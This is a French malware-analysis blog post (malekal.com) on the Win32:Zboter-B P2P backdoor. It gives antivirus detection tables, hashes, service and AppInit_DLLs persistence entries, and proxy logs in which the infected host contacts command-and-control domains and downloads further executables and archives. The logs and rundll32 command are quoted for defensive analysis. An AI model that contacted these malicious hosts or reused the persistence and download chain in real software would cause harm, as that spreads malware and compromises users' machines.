Win32:Zboter-B : Backdoor P2P

Petite récupération d’une Backdoor via un sujet sur un forum : http://www.virustotal.com/file-scan/report.html?id=e86220cb5aea573766da85b0c43b220bb7abc8a7d42b9033c8169d2e0558677c-1302351941

La détection est relativement bonne :

File name: dbgdev40.exe
Submission date: 2011-04-09 12:25:41 (UTC)
Current status: finished
Result: 17/ 41 (41.5%) 

Print results
Antivirus     Version     Last Update     Result
AhnLab-V3    2011.04.09.00    2011.04.08    Malware/Win32.Generic
AntiVir    7.11.6.19    2011.04.08    TR/Crypt.EPACK.Gen2
Antiy-AVL    2.0.3.7    2011.04.09    –
Avast    4.8.1351.0    2011.04.09    Win32:Zboter-B
Avast5    5.0.677.0    2011.04.09    Win32:Zboter-B
AVG    10.0.0.1190    2011.04.09    SHeur3.BUCT
BitDefender    7.2    2011.04.09    Gen:Variant.Kazy.17580
CAT-QuickHeal    11.00    2011.04.09    (Suspicious) – DNAScan
ClamAV    0.97.0.0    2011.04.09    –
Commtouch    5.2.11.5    2011.04.06    –
Comodo    8279    2011.04.09    TrojWare.Win32.Kryptik.LNM
DrWeb    5.0.2.03300    2011.04.09    Trojan.DownLoader2.29693
eSafe    7.0.17.0    2011.04.07    –
eTrust-Vet    36.1.8261    2011.04.08    –
F-Prot    4.6.2.117    2011.04.09    –
F-Secure    9.0.16440.0    2011.04.09    Gen:Variant.Kazy.17580
Fortinet    4.2.254.0    2011.04.09    –
GData    22    2011.04.09    Gen:Variant.Kazy.17580
Ikarus    T3.1.1.103.0    2011.04.09    Gen.Variant.Kazy
Jiangmin    13.0.900    2011.04.09    –
K7AntiVirus    9.96.4347    2011.04.09    –
Kaspersky    7.0.0.125    2011.04.09    –
McAfee    5.400.0.1158    2011.04.09    Artemis!8E732E6442B5
McAfee-GW-Edition    2010.1C    2011.04.09    Artemis!8E732E6442B5
Microsoft    1.6702    2011.04.09    –
NOD32    6028    2011.04.09    –
Norman    6.07.07    2011.04.09    –
Panda    10.0.3.5    2011.04.09    Suspicious file
PCTools    7.0.3.5    2011.04.07    –
Prevx    3.0    2011.04.09    –
Rising    23.52.05.05    2011.04.09    –
Sophos    4.64.0    2011.04.09    Mal/Generic-L
SUPERAntiSpyware    4.40.0.1006    2011.04.07    –
Symantec    20101.3.2.89    2011.04.09    –
TheHacker    6.7.0.1.170    2011.04.09    –
TrendMicro    9.200.0.1012    2011.04.09    –
TrendMicro-HouseCall    9.200.0.1012    2011.04.09    –
VBA32    3.12.14.3    2011.04.08    –
VIPRE    8966    2011.04.09    Trojan.Win32.Generic!BT
ViRobot    2011.4.9.4402    2011.04.09    –
VirusBuster    13.6.295.0    2011.04.08    –
Additional information
MD5   : 8e732e6442b5e377967d67cb9a394fae
SHA1  : d50ff2aeec46783744b987b59ba30768bbcf2dd7
SHA256: e86220cb5aea573766da85b0c43b220bb7abc8a7d42b9033c8169d2e0558677c

La détection Win32:Zboter-A chez Avast! a été ajouté le 9 Janvier.
Il semble que le malware soit détecté en Trojan-Zbot mais les caractéristiques de ce dernier ne correspondant pas vraiment.

Ce dernier est lancé par un service, HijackThis n’affiche pas le service (peut-être dû à la whitelist sur Microsoft Corporation) – OTL le montre sans souci :
SRV – [2011/04/09 15:16:33 | 000,564,736 | —- | M] (Microsoft Corporation) [Auto | Running] — C:\WINDOWS\System32\syshelp.exe — (syshelp.exe)

Le malware est lancé avec les paramètres suivants où /p doit être le port de communication :

« C:\WINDOWS\system32\syshelp.exe » /s /p 27016

Ce dernier embarque le protocole de communication Gnutella :

Backdoor Win:32Zboter : Backdor P2PBackdoor Win:32Zboter : Backdor P2P

On peux d’ailleurs voir les communications avec les peers :

Backdoor Win:32Zboter : Backdor P2P
Ceci n’a rien à voir avec les mécanismes de Trojan-Zbot
Le malware se connecte aux adresses suivants pour récupérer en autre les dernières versions disponibles :
1302353051.696     79 192.168.1.27 TCP_MISS/200 272 GET http://victsecrets.com/fork/ipinfo?v=2.6c&c=NqCgIru%2frq1xGol5BmqhDQ%2f%2bbwEw9EU%2fNonsRhSbEgCYe9at76StSX1ZTyXNAOoiV%2fLsYlCK%2b4gUr7NlOYSp2zMGCMpxrz4LYB8UXfDWDRy%2f8I6LBA1XUgo%2bndJAknWAMcyotiZuGwceYIa8bndlzsNgXIYN38Ty&p=Ntc%3d – DIRECT/95.142.100.56 –
1302353051.783     82 192.168.1.27 TCP_MISS/200 248 GET http://victsecrets.com/fork/update?v=2.6c&c=NqCgIru%2frq1xGol5BmqhDQ%2f%2bbwEw9EU%2fNonsRhSbEgCYe9at76StSX1ZTyXNAOoiV%2fLsYlCK%2b4gUr7NlOYSp2zMGCMpxrz4LYB8UXfDWDRy%2f8I6LBA1XUgo%2bndJAknWAMcyotiZuGwceepmYVWU0g9BySJMX3%2bKFt8XcpTHja07rYbrNPTM%3d&p=NqCgIqm1uOYhVNp5FWK0RCfbbCpx%2bEI%2ffd2%2fCVjRdWKWHqG31e%2flW1wFbAHaYpEzVOekWWnu0aJAiOkyEcb%2bhGNYQqQm%2bgwodwdvOIHPRlPw4a%2b4UScXZxkm5Lc1nFODMcyxr2clTUIeYpCWVnkMpOhiD8hGieyvhMeJ6hnKWEysS4qOaC2REiMsZ%2fBAo%2bemCGIBkQfInA%2fE7uBHHnu14mhxnzinXBd0wUZHkl59U5lgRscpIq%2bbrvpXoF0j5QTqSjp7wpQC0RgaPgXzsOYjwi6GrrFN6Dt0Ve5PMdn%2bB69EV1zjBtU1UvNzaWUs5KI8OG9%2f31Hkn2cqciZqTMXCt0mC – DIRECT/95.142.100.56 –
Une recherche sur le domaine victsecrets.com montre que ce dernier est déjà connu – en autre par malware-control.com :
http://www.malware-control.com/statics-pages/7f3ede16168a5900a3612f11634f49d3.php
http://www.malware-control.com/statics-pages/9a19dc61ecf4f55e620f96300f8979ec.php
http://www.malware-control.com/statics-pages/2cb038bdaac54a51d398efb570024aff.php
Si une version plus récente est disponible, le malware se connecte sur flickr pour récupérer l’adresse de la dernière version dispnible :
1302352365.012     98 192.168.1.27 TCP_MISS/200 317 POST http://try2findall.com:8080/flickr/ini/?a=3252&c= – DIRECT/95.142.100.26 text/html
1302352365.283     78 192.168.1.27 TCP_MISS/200 317 POST http://try2findall.com:8080/flickr/ini/?a=3252&c= – DIRECT/95.142.100.26 text/html
1302352471.181     83 192.168.1.27 TCP_MISS/200 1091 GET http://try2findall.com:8080/flickr/?a=3252&c= – DIRECT/95.142.100.26 text/html
Backdoor Win:32Zboter : Backdoor P2PCe dernier télécharge alors une mise à jour :
1302352471.485    103 192.168.1.27 TCP_MISS/302 398 GET http://updatedfiles.com/myspace/?f=4&a=3252 – DIRECT/89.149.242.216 text/html
1302352473.432   1946 192.168.1.27 TCP_MISS/200 579472 GET http://updatedfiles.com/myspace/out/3252/x3252.exe – DIRECT/89.149.242.216 application/octet-stream
1302352490.353   2659 192.168.1.27 TCP_MISS/200 2873487 GET http://updatenetworking.com/nyt2/m7-401.zip?a=3252&c= – DIRECT/91.224.160.32 application/zip

Ce dernier droppe une DLL qui se lance via la clef AppInit_DLLS :

O20 – AppInit_DLLs: mmcperf.dll

qui lance rundll32 avec les paramètres suivants :

rundll32 « C:\WINDOWS\system32\mmcperf.dll »,popup http://winstat32x.com/url/in.cgi?69EB4EE60BA0D0AE5BA109B20FFE5C96E266709154AF58AEC5AFF3DE0D4F18CED NULL FALSE NULL NULL NULL NULL NULL NULL NULL NULL NULL

Possible Trojan-Vundo.

La détection :

File name: x3252.exe
Submission date: 2011-04-09 12:30:55 (UTC)
Current status: finished
Result: 10 /42 (23.8%)
Antivirus     Version     Last Update     Result
AhnLab-V3     2011.04.09.00     2011.04.08     –
AntiVir     7.11.6.19     2011.04.08     TR/Crypt.EPACK.Gen2
Antiy-AVL     2.0.3.7     2011.04.09     –
Avast     4.8.1351.0     2011.04.09     Win32:Zboter-B
Avast5     5.0.677.0     2011.04.09     Win32:Zboter-B
AVG     10.0.0.1190     2011.04.09     –
BitDefender     7.2     2011.04.09     Gen:Variant.Kazy.17580
CAT-QuickHeal     11.00     2011.04.09     (Suspicious) – DNAScan
ClamAV     0.97.0.0     2011.04.09     –
Commtouch     5.2.11.5     2011.04.06     –
Comodo     8279     2011.04.09     TrojWare.Win32.Kryptik.LNM
DrWeb     5.0.2.03300     2011.04.09     –
Emsisoft     5.1.0.5     2011.04.09     –
eSafe     7.0.17.0     2011.04.07     –
eTrust-Vet     36.1.8261     2011.04.08     –
F-Prot     4.6.2.117     2011.04.09     –
F-Secure     9.0.16440.0     2011.04.09     Gen:Variant.Kazy.17580
Fortinet     4.2.254.0     2011.04.09     –
GData     22     2011.04.09     Gen:Variant.Kazy.17580
Ikarus     T3.1.1.103.0     2011.04.09     –
Jiangmin     13.0.900     2011.04.09     –
K7AntiVirus     9.96.4347     2011.04.09     –
Kaspersky     7.0.0.125     2011.04.09     –
McAfee     5.400.0.1158     2011.04.09     –
McAfee-GW-Edition     2010.1C     2011.04.09     –
Microsoft     1.6702     2011.04.09     –
NOD32     6028     2011.04.09     –
Norman     6.07.07     2011.04.09     –
Panda     10.0.3.5     2011.04.09     Suspicious file
PCTools     7.0.3.5     2011.04.07     –
Prevx     3.0     2011.04.09     –
Rising     23.52.05.05     2011.04.09     –
Sophos     4.64.0     2011.04.09     Mal/Swizzor-D
SUPERAntiSpyware     4.40.0.1006     2011.04.07     –
Symantec     20101.3.2.89     2011.04.09     –
TheHacker     6.7.0.1.170     2011.04.09     –
TrendMicro     9.200.0.1012     2011.04.09     –
TrendMicro-HouseCall     9.200.0.1012     2011.04.09     –
VBA32     3.12.14.3     2011.04.08     –
VIPRE     8966     2011.04.09     –
ViRobot     2011.4.9.4402     2011.04.09     –
VirusBuster     13.6.295.0     2011.04.08     –
Additional information
MD5   : 6b6f648387ec18e38b269f449b78f091
SHA1  : 2484f41d37aeb1ff03809debfd2ef80cdb80fa6e
SHA256: 506c32f3dc30ac71bc648caf896027716e4b34d995231081bfe333b2e9c753ca

Bref une backdoor qui permet le contrôle de l’ordinateur et installe un adware pour monétiser.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 35 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *